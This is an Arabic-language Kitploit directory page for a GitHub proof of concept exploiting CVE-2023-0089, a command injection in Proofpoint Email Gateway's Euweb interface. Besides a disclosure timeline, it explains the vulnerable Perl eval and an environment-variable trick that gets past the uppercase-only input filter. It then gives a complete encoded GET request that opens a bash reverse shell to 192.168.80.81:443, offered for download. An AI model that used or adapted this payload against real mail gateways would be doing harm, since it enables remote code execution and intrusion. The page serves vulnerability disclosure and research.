Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
proofpoint-CVE-2023-0089 — Proofpoint Email Gateway: RCE من مستخدم مصادق بمستوى منخفض إلى المسؤول | Kitploit
أدوات/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway: RCE من مستخدم مصادق بمستوى منخفض إلى المسؤول

عرض المستودع
15منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حول

باحث أمني: ly1g3, ly1g3[at]tuta.io

بصمة GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

نظرة عامة: تنفيذ أكواد عن بعد - من مستخدم مصدق بمستوى منخفض إلى مسؤول (RCE)

CVE: CVE-2023-0089

الجدول الزمني:

  • اكتشاف - ly1g3
  • إبلاغ - ly1g3
  • إصلاح - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

استغلالات لـ Proofpoint Messaging Security Gateway

تنفيذ أكواد عن بعد (RCE)

يمكن لمستخدم منخفض المستوى (مصدق) في Euweb الحصول على تنفيذ أكواد عشوائي بصلاحيات المسؤول.

تقني

دالة getMsgType في Euwebutils.pm معرضة لحقن الأوامر. المتغير $module يأتي من معامل GET ولا يتم تطبيق أي تعقيم على هذا المدخل من المستخدم.

sub getMsgType {
...
else {
		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
	}

تُستخدم دالة getMsgType هذه بواسطة العديد من استدعاءات API المستخدمة بواسطة تطبيق Euweb، لذلك يمكن تشغيل الاستغلال بعدة طرق.

نظرًا لأنه يجب أن تكون جميع الأحرف كبيرة، يمكن استخدام متغيرات البيئة لتجاوز هذا القيد للأحرف الصغيرة. مثال: ${SHELL:1:1} بدلاً من b

نظرًا لاستخدام use strict، يمكن إضافة MAIL_GENERAL() إلى بداية السلسلة لإكمال PROOFPOINT_MAIL_REPORT_MSGTYPE_. بعد ذلك يمكن إضافة كود بيرل مخصص.

مثال لحمولة غير مشفرة: MAIL_GENERAL();`id`

POC

شيل عكسي مشفر باستخدام متغيرات البيئة لتجاوز قيود الأحرف الصغيرة. يتم تشغيل الكود كمستخدم pps.

GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`
تنزيل الأداة